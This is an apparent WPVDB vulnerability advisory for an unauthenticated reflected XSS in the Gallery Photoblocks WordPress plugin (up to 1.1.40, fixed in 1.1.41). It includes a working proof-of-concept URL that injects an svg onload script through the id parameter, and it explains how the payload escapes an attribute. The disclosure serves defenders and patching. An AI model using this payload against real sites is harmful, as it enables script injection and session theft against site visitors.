Gallery Photoblocks <= 1.1.40 - Unauthenticated Reflected XSS



Description
The id parameter of admin/partials/photoblocks-edit.php is reflected into the page without output encoding, and the file can be requested directly, so the reflected XSS needs no authentication. Depending on the server's configuration (typically when PHP error display is enabled), the same request also discloses the full filesystem path of the plugin.
Proof of Concept
https://<BLOG>/wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id="><svg/onload=alert(/XSS/)>
The leading "> closes a quoted attribute if id is reflected inside one; the svg onload handler then runs in the blog's origin. URL-encode the payload if the client does not do so itself.

Affects Plugin

Gallery Photoblocks (photoblocks-grid-gallery), versions up to and including 1.1.40; fixed in version 1.1.41

References

URL https://plugins.trac.wordpress.org/changeset/2117972

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2035
Verified Yes
WPVDB ID 9425

Timeline

Publicly Published 2019-07-05
Added 2019-07-05
Last Updated 2019-07-09
